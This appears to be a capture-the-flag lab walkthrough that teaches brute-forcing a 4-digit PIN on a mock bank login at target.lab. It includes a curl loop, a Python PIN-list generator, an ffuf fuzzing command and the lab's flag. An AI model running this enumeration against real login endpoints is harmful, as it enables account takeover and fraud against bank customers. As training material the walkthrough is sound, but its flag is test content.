Learn Hacking by Actually Hacking

Difficulty

Easy

Vuln class

Brute Force / PIN Enumeration

Steps

// Objective

Brute-force a 4-digit PIN for FirstBank's online banking login. The target customer is known (account number provided) — enumerate all 10,000 possible PINs.

// Tools required

ffufcurlpython3

// Step-by-step walkthrough

Understand the login mechanism

The FirstBank portal authenticates with an account number and a 4-digit PIN. Intercept a login attempt to see the request format.

Command / Input

POST /api/auth/login Content-Type: application/json {"account":"10042871","pin":"0000"}

Output

{"error":"Invalid PIN"}

Confirm no lockout policy

Send 20 failed attempts back-to-back. If the account stays unlocked, the endpoint is fully brute-forceable.

Command / Input

for pin in 0000 0001 0002 0003 0004; do curl -s -X POST /api/auth/login -d "{"account":"10042871","pin":"$pin"}" done

Output

{"error":"Invalid PIN"} x5 — no lockout triggered.

Generate and run a full PIN wordlist

A 4-digit PIN has 10,000 possibilities (0000–9999). Generate the list with Python and pipe it into ffuf.

Command / Input

python3 -c "print('\n'.join(f'{i:04d}' for i in range(10000)))" > pins.txt ffuf -u http://target.lab/api/auth/login \ -X POST \ -H "Content-Type: application/json" \ -d '{"account":"10042871","pin":"FUZZ"}' \ -w pins.txt \ -fs 23

Output

[Status: 200, Size: 89] 4291

⚑ The valid PIN is 4291. With no rate limiting, this takes under a minute.

Enter the discovered PIN in the banking portal to authenticate.

Command / Input

Account: 10042871 PIN: 4291

Output

// Flag

Flag value

HackrGG{f1rstb4nk_br0t3f0rc3d_p1n}

Displayed on the account dashboard after successful PIN brute-force.

Online Banking Login — FirstBank